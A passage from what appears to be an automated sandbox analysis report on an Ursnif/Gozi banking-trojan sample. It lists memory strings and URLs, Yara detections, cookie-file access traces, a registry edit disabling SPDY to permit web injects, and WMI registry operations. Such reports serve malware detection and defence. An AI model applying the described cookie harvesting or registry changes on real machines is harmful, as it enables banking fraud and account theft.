          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.docUrl.com/bar.htm
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: RuntimeBroker.exe, 00000027.00000002.579872575.0000017766517000.00000004.00000001.sdmp | String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Termsame
          Source: RuntimeBroker.exe, 00000027.00000002.580051152.0000017766540000.00000004.00000001.sdmp | String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_TermslonWdtP
          Source: RuntimeBroker.exe, 00000027.00000002.580051152.0000017766540000.00000004.00000001.sdmp | String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Termslse
          Source: RuntimeBroker.exe, 00000027.00000002.580051152.0000017766540000.00000004.00000001.sdmp | String found in binary or memory: http://www.g5e.com/termsofservice
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmp | String found in binary or memory: http://z.about.com/m/a08.ico
          Source: powershell.exe, 00000018.00000002.408122537.0000027D90063000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000018.00000002.408122537.0000027D90063000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000018.00000002.408122537.0000027D90063000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000018.00000003.334029569.0000027DF6CC7000.00000004.00000001.sdmp, powershell.exe, 00000018.00000002.391542356.0000027D8020E000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
          Source: RuntimeBroker.exe, 00000027.00000002.580051152.0000017766540000.00000004.00000001.sdmp | String found in binary or memory: https://instagram.com/hiddencity_
          Source: powershell.exe, 00000018.00000002.408122537.0000027D90063000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          Yara detected Ursnif
          Source: Yara match | File source: 00000000.00000003.288648996.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.288684666.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.288770210.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000025.00000002.379471781.0000029741FAE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000024.00000002.581129276.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000023.00000003.365667494.00000264BEA60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000023.00000002.378635479.000000000081E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000025.00000003.378001712.0000029741D50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.288621987.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.358702565.00000000011A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.288591896.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.295245687.0000000003EEB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.288759525.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.288745894.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000018.00000003.355550125.0000027DF7010000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.377751018.0000000003120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.288726678.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000027.00000002.579128816.000001776603E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6736, type: MEMORY
          Source: Yara match | File source: Process Memory Space: control.exe PID: 4544, type: MEMORY
          Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
          Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4000, type: MEMORY
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5276, type: MEMORY
          Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY
          Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4376, type: MEMORY

          E-Banking Fraud:

          Detected Gozi e-Banking trojan
          Source: C:\Windows\System32\loaddll32.exe | Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff | 0_2_03125ECA
          Source: C:\Windows\System32\loaddll32.exe | Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie | 0_2_03125ECA
          Source: C:\Windows\System32\loaddll32.exe | Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff | 0_2_03125ECA
          Yara detected Ursnif
          Source: Yara match | File source: 00000000.00000003.288648996.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.288684666.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.288770210.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000025.00000002.379471781.0000029741FAE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000024.00000002.581129276.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000023.00000003.365667494.00000264BEA60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000023.00000002.378635479.000000000081E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000025.00000003.378001712.0000029741D50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.288621987.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.358702565.00000000011A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.288591896.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.295245687.0000000003EEB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.288759525.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.288745894.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000018.00000003.355550125.0000027DF7010000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.377751018.0000000003120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000003.288726678.0000000004068000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara match | File source: 00000027.00000002.579128816.000001776603E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6736, type: MEMORY
          Source: Yara match | File source: Process Memory Space: control.exe PID: 4544, type: MEMORY
          Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
          Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4000, type: MEMORY
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5276, type: MEMORY
          Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3668, type: MEMORY
          Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4376, type: MEMORY
          Disables SPDY (HTTP compression, likely to perform web injects)
          Source: C:\Windows\explorer.exe | Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | EnableSPDY3_0 = 0

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Win32.Gozi, Author: CCN-CERT
          Source: 00000025.00000002.379471781.0000029741FAE000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Win32.Gozi, Author: CCN-CERT
          Source: 00000024.00000002.581129276.000001FC1383E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Win32.Gozi, Author: CCN-CERT
          Source: 00000023.00000003.365667494.00000264BEA60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Win32.Gozi, Author: CCN-CERT
          Source: 00000023.00000002.378635479.000000000081E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Win32.Gozi, Author: CCN-CERT
          Source: 00000025.00000003.378001712.0000029741D50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Win32.Gozi, Author: CCN-CERT
          Source: 00000018.00000003.355550125.0000027DF7010000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Win32.Gozi, Author: CCN-CERT
          Source: 00000027.00000002.579128816.000001776603E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Win32.Gozi, Author: CCN-CERT
          Writes or reads registry keys via WMI
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Writes registry values via WMI